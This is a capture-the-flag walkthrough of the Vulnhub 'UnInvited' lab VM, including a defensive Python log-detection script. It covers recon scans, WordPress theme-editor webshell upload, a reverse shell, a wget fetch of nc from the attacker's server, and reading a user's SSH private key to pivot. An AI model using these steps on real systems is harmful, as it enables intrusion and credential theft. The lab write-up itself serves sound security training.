Vulnhub UnInvited: machine walkthrough

UnInvited

Identifying the target host IP address

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                               
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:b2:b4:d3      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.146  08:00:27:ab:59:15      1      60  PCS Systemtechnik GmbH        

Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.146.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.146 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-03 22:55 EST
Nmap scan report for localhost (192.168.56.146)
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: SEC-CORP
7894/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 afd242e431ff4ffb0bde18e93fc4bc42 (RSA)
|   256 97564740ea99b2a61aa559567e2bb4a0 (ECDSA)
|_  256 b2b1674475f6d832a2f2ff7f09a77d53 (ED25519)
60000/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: UNINVITED
MAC Address: 08:00:27:AB:59:15 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.08 seconds

The NMAP scan shows that the target host has 3 open ports: 80 (http), 7894 (ssh) and 60000 (http).

Port 60000 is serving a WordPress site.

Getting a shell

Browsing to port 80 from Kali Linux, a comment is visible in the source of the returned page; decoding it:

</footer>
	<!-- Footer section end -->
	<!--WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=-->

	<!--====== Javascripts & Jquery ======-->
	<script src="js/jquery-3.2.1.min.js"></script>
	<script src="js/bootstrap.min.js"></script>
	<script src="js/owl.carousel.min.js"></script>
	<script src="js/jquery.magnific-popup.min.js"></script>
	<script src="js/circle-progress.min.js"></script>
	<script src="js/main.js"></script>
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=' | base64 -d
Yeah! I know it happens... I guess u might want to add this [fieldforce] to your hosts  v

A hosts entry needs to be added: fieldforce

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo vim /etc/hosts                                        
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.146  fieldforce

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ curl http://192.168.56.146/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.146 Port 80</address>
</body></html>
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ nikto -h http://192.168.56.146
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.146
+ Target Hostname:    192.168.56.146
+ Target Port:        80
+ Start Time:         2023-03-03 23:03:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 34af, size: 5abb5cae20433, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-03-03 23:04:02 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ gobuster dir -u http://192.168.56.146 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.146
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,sh,php,html
[+] Timeout:                 10s
===============================================================
2023/03/03 23:04:55 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/about.html           (Status: 200) [Size: 11039]
/contact.html         (Status: 200) [Size: 7902]
/blog.html            (Status: 200) [Size: 8621]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.146/img/]
/index.html           (Status: 200) [Size: 13487]
/service.html         (Status: 200) [Size: 13090]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.146/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.146/js/]
/elements.html        (Status: 200) [Size: 13628]
/Source               (Status: 301) [Size: 317] [--> http://192.168.56.146/Source/]
/.html                (Status: 403) [Size: 294]
/.php                 (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 302]
Progress: 1098491 / 1102805 (99.61%)===============================================================
2023/03/03 23:06:58 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ nikto -h http://192.168.56.146:60000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.146
+ Target Hostname:    192.168.56.146
+ Target Port:        60000
+ Start Time:         2023-03-03 23:08:26 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.56.146:60000/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'link' found, with contents: <http://fieldforce:60000/wp-json/>; rel="https://api.w.org/"
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (400)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3092: /backdoor/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /server-status: Apache server-status interface found (protected/forbidden)
+ 7923 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2023-03-03 23:10:42 (GMT-5) (136 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 


The scan of port 60000 turned up /backdoor, but it is just the WordPress admin login page.

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000/backdoor/ -e u,p --wp-content-dir /wp-content
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/backdoor/ [192.168.56.146]
[+] Started: Fri Mar  3 23:13:17 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.38 (Debian)
 |  - X-Powered-By: PHP/7.4.8
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.146:60000/backdoor/e442977.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.146:60000/backdoor/e442977.html, Match: 'WordPress 5.4.2'

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Mar  3 23:13:19 2023
[+] Requests Done: 51
[+] Cached Requests: 8
[+] Data Sent: 14.547 KB
[+] Data Received: 243.427 KB
[+] Memory used: 224.445 MB
[+] Elapsed time: 00:00:02
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000/backdoor/ -e u,p --wp-content-dir /wp-content --plugins-detection mixed
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/backdoor/ [192.168.56.146]
[+] Started: Fri Mar  3 23:14:00 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.38 (Debian)
 |  - X-Powered-By: PHP/7.4.8
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.146:60000/backdoor/1688692.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.146:60000/backdoor/1688692.html, Match: 'WordPress 5.4.2'

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:21 <============================================> (1500 / 1500) 100.00% Time: 00:00:21
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.56.146:60000/wp-content/plugins/akismet/
 | Latest Version: 5.0.1
 | Last Updated: 2022-11-08T05:36:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.146:60000/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] wps-hide-login
 | Location: http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/
 | Last Updated: 2022-05-25T13:06:00.000Z
 | Readme: http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt
 | [!] The version is out of date, the latest version is 1.9.6
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/, status: 403
 |
 | Version: 1.5.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Mar  3 23:14:24 2023
[+] Requests Done: 1519
[+] Cached Requests: 51
[+] Data Sent: 453.51 KB
[+] Data Received: 521.992 KB
[+] Memory used: 270.008 MB
[+] Elapsed time: 00:00:23

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000 -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/ [192.168.56.146]
[+] Started: Sat Mar  4 00:07:24 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.38 (Debian)
 |  - X-Powered-By: PHP/7.4.8
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.146:60000/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.146:60000/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.146:60000/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.146:60000/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.146:60000/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.146:60000/, Match: 'WordPress 5.4.2'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] elliot
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.56.146:60000/wp-json/wp/v2/users/?per_page=100&page=1

[+] Elliot
 | Found By: Rss Generator (Aggressive Detection)

[+] 1
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Mar  4 00:07:35 2023
[+] Requests Done: 46
[+] Cached Requests: 5
[+] Data Sent: 12.027 KB
[+] Data Received: 282.581 KB
[+] Memory used: 145.406 MB
[+] Elapsed time: 00:00:11
                                              

This scan found the username elliot.

The password is a word that appears in the page content: wh1ter0se

Building a wordlist with cewl did not produce the password above, which is a bit strange.

After logging in, I tried to modify the 404.php template, but an error was returned:

Using another approach: still in the theme editor, but select a different theme on the right (one that is not activated), replace the contents of 404.php with the code of shell.php, then click Update File; this time no error is returned.

Then visit 404.php under that theme.

Summary: on this machine the active WordPress theme is nanospace, and modifying the 404.php template of that theme failed. Note that there is no need to actually switch themes; instead, in the "Select theme to edit:" dropdown at the top right, choose any other theme, for example Twenty Nineteen in this case, and modify 404.php under that theme, which succeeds. The URL used to reach 404.php must then match the Twenty Nineteen theme directory.
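From the defender's side, the technique above leaves two traces in the web server log: a file save through wp-admin/theme-editor.php and a direct 2xx request to a template file under wp-content/themes. The following Python detection logic is an added example (not part of the original write-up); the access-log lines are constructed in Apache combined format, and the Twenty Nineteen 404.php path is the one visited above.

```python
"""Flag WordPress theme-editor abuse in Apache combined-format access logs.

Added example, not from the original write-up. The log lines are constructed.
A genuine theme template requested directly normally fails, because WordPress
functions such as get_header() are undefined outside the loader, so a clean
2xx on /wp-content/themes/<theme>/<file>.php is a strong signal that the file
was replaced.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# host ident user [time] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Any PHP file directly under a theme directory (404.php, header.php, ...).
THEME_TEMPLATE_RE = re.compile(
    r'^/wp-content/themes/(?P<theme>[^/]+)/(?P<file>[^/?]+\.php)(\?.*)?$'
)
THEME_EDITOR_PATH = "/wp-admin/theme-editor.php"


@dataclass
class Alert:
    ip: str
    time: str
    reason: str
    path: str


def analyse_line(line: str) -> Optional[Alert]:
    m = LOG_RE.match(line)
    if not m:
        return None
    method, path, status = m["method"], m["path"], int(m["status"])
    # 1) A file was saved through the built-in theme editor.
    if method == "POST" and path.split("?")[0] == THEME_EDITOR_PATH:
        return Alert(m["ip"], m["time"], "theme editor file save", path)
    # 2) A theme template was requested directly and executed without error.
    t = THEME_TEMPLATE_RE.match(path)
    if t and 200 <= status < 300:
        reason = f"direct execution of theme template {t['theme']}/{t['file']}"
        return Alert(m["ip"], m["time"], reason, path)
    return None


def scan_log(lines: Iterable[str]) -> List[Alert]:
    return [a for a in (analyse_line(l) for l in lines) if a is not None]


# Constructed sample log (not captured from the machine).
SAMPLE_LOG = """\
192.168.56.206 - - [04/Mar/2023:00:20:11 -0500] "GET /wp-content/themes/twentynineteen/style.css HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.56.206 - - [04/Mar/2023:00:21:03 -0500] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "http://fieldforce:60000/wp-admin/theme-editor.php?file=404.php&theme=twentynineteen" "Mozilla/5.0"
192.168.56.206 - - [04/Mar/2023:00:21:40 -0500] "GET /wp-content/themes/twentynineteen/404.php HTTP/1.1" 200 0 "-" "curl/7.88.1"
192.168.56.206 - - [04/Mar/2023:00:22:05 -0500] "GET /wp-content/themes/nanospace/404.php HTTP/1.1" 500 512 "-" "curl/7.88.1"
192.168.56.206 - - [04/Mar/2023:00:22:30 -0500] "GET /some-missing-page HTTP/1.1" 404 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{alert.time} {alert.ip} {alert.reason}: {alert.path}")
```

Setting define('DISALLOW_FILE_EDIT', true) in wp-config.php removes the theme editor entirely, which prevents the first event from being possible at all.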

fieldforce:60000/wp-content/themes/twentynineteen/404.php
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.146] 48992
Linux f950b9c50e1d 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 GNU/Linux
 06:06:22 up  2:27,  0 users,  load average: 3.31, 3.54, 3.46
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@f950b9c50e1d:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@f950b9c50e1d:/$ 

www-data@f950b9c50e1d:/$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.18.0.3  netmask 255.255.0.0  broadcast 172.18.255.255
        ether 02:42:ac:12:00:03  txqueuelen 0  (Ethernet)
        RX packets 16616729  bytes 18729729659 (17.4 GiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 17075528  bytes 2087397916 (1.9 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2488485  bytes 130686616 (124.6 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2488485  bytes 130686616 (124.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

www-data@f950b9c50e1d:/$ 

The shell obtained so far appears to be inside a container.

www-data@f950b9c50e1d:/home/demodocker/.local$ ls -alh
ls -alh
total 16K
drwxr-xr-x 3 demodocker demodocker 4.0K Jul 29  2020 .
drwxr-xr-x 3 demodocker demodocker 4.0K Jul 30  2020 ..
-rw-r--r-- 1 demodocker demodocker   57 Jul 29  2020 note.txt
drwx------ 3 demodocker demodocker 4.0K Jul 28  2020 share
www-data@f950b9c50e1d:/home/demodocker/.local$ cat note.txt
cat note.txt
ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs' | base64 -d
encoded twice LS0taXAtLS0vZnNvY2lldHkuZXhl                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'LS0taXAtLS0vZnNvY2lldHkuZXhl' | base64 -d                            
---ip---/fsociety.exe                                                                                                                              

This indicates that the fsociety.exe file is at 192.168.56.146/fsociety.exe; download it to Windows.

Username: elliot, password: mrrobot (the word does appear on the web page, but honestly this is quite a stretch).

www-data@f950b9c50e1d:/$ which nc
which nc
www-data@f950b9c50e1d:/$ 

There is no nc on the target machine; it can be downloaded from Kali Linux.

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ cp /usr/bin/nc .                  
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ ls -alh                                                                     
total 2.9M
drwxr-xr-x  5 kali kali 4.0K Mar  4 04:05 .
drwxr-xr-x 26 kali kali 4.0K Mar  3 22:52 ..
drwxr-xr-x  6 kali kali 4.0K Jun  5  2017 Magnific-Popup-master
-rw-r--r--  1 kali kali 339K Mar  3 23:05 Magnific-Popup-master.zip
drwxr-xr-x  7 kali kali 4.0K Mar  4 00:40 nanospace
-rw-r--r--  1 kali kali 1.7M Mar  4 00:41 nanospace1.zip
-rwxr-xr-x  1 kali kali  35K Mar  4 04:05 nc
-rw-r--r--  1 root root 1.2K Mar  3 22:55 nmap_full_scan
drwxr-xr-x  7 kali kali 4.0K Apr 20  2018 OwlCarousel2-2.3.4
-rw-r--r--  1 kali kali 774K Mar  3 23:05 OwlCarousel2-2.3.4.zip
-rwx------  1 kali kali 5.4K Mar  4 00:21 shell.php
-rw-r--r--  1 kali kali 2.4K Mar  4 00:26 shell.zip
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

www-data@f950b9c50e1d:/tmp$ wget http://192.168.56.206:8000/nc
wget http://192.168.56.206:8000/nc
--2023-03-04 09:05:46--  http://192.168.56.206:8000/nc
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34952 (34K) [application/octet-stream]
Saving to: ‘nc’

nc                  100%[===================>]  34.13K  --.-KB/s    in 0s      

2023-03-04 09:05:46 (853 MB/s) - ‘nc’ saved [34952/34952]

www-data@f950b9c50e1d:/tmp$ ls -alh
ls -alh
total 48K
drwxrwxrwt 1 root     root     4.0K Mar  4 09:05 .
drwxr-xr-x 1 root     root     4.0K Jul 28  2020 ..
-rw-rw-rw- 1 www-data www-data  35K Mar  4 09:05 nc
drwxr-xr-x 5 root     root     4.0K Jul 23  2020 pear
www-data@f950b9c50e1d:/tmp$ chmod 777 nc
chmod 777 nc

According to the hint, if the IP is 172.18.0.3, then nc should listen on port 8888.

www-data@f950b9c50e1d:/tmp$ ./nc -nlvp 8888
./nc -nlvp 8888
listening on [any] 8888 ...

www-data@f950b9c50e1d:/tmp$ ./nc -nlvp 8888
./nc -nlvp 8888
listening on [any] 8888 ...
connect to [172.18.0.3] from (UNKNOWN) [172.18.0.1] 54482
id
id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)
/home/docksec> ls -alh
ls -alh
total 52K
drwxr-xr-x 7 docksec docksec 4.0K Jul 30  2020 .
drwxr-xr-x 4 root    root    4.0K Jul 28  2020 ..
-rw------- 1 docksec docksec 1.1K Jul 30  2020 .bash_history
-rw-r--r-- 1 docksec docksec  220 Jul 28  2020 .bash_logout
-rw-r--r-- 1 docksec docksec 3.7K Jul 28  2020 .bashrc
drwx------ 2 docksec docksec 4.0K Jul 29  2020 .cache
drwx------ 3 docksec docksec 4.0K Jul 29  2020 .gnupg
drwxrwxr-x 3 docksec docksec 4.0K Jul 28  2020 .local
-rw-r--r-- 1 docksec docksec  807 Jul 28  2020 .profile
drwx------ 2 docksec docksec 4.0K Jul 29  2020 .secret
-rw-rw-r-- 1 docksec docksec   66 Jul 29  2020 .selected_editor
drwx------ 2 docksec docksec 4.0K Jul 29  2020 .ssh
-r-------- 1 docksec docksec  318 Jul 28  2020 user1.txt
/home/docksec> cat user1.txt
cat user1.txt
 _______ __   __ ___ ___     _______ 
|       |  |_|  |   |   |   |       |
|  _____|       |   |   |   |    ___|
| |_____|       |   |   |   |   |___ 
|_____  |       |   |   |___|    ___|
 _____| | ||_|| |   |       |   |___ 
|_______|_|   |_|___|_______|_______|


FLAG{DASDGFGPXLCKDEG5D7635CSDAFDIMMJDSUWEQDSADIG}
/home/docksec> cd .ssh
cd .ssh
www-data@f950b9c50e1d:/tmp$ ls -alh
ls -alh
total 48K
drwxrwxrwt 1 root     root     4.0K Mar  4 09:05 .
drwxr-xr-x 1 root     root     4.0K Jul 28  2020 ..
-rwxrwxrwx 1 www-data www-data  35K Mar  4 09:05 nc
drwxr-xr-x 5 root     root     4.0K Jul 23  2020 pear
www-data@f950b9c50e1d:/tmp$ 

/home/docksec> cat ./.ssh/id_rsa
cat ./.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key body omitted]
-----END RSA PRIVATE KEY-----
/home/docksec> 

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ ssh -i id_rsa docksec@192.168.56.146 -p 7894
The authenticity of host '[192.168.56.146]:7894 ([192.168.56.146]:7894)' can't be established.
ED25519 key fingerprint is SHA256:TDHE9jZRgNWTCsD16WZXDrJFcTVA6M9yWrX7pXR0VyY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.146]:7894' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

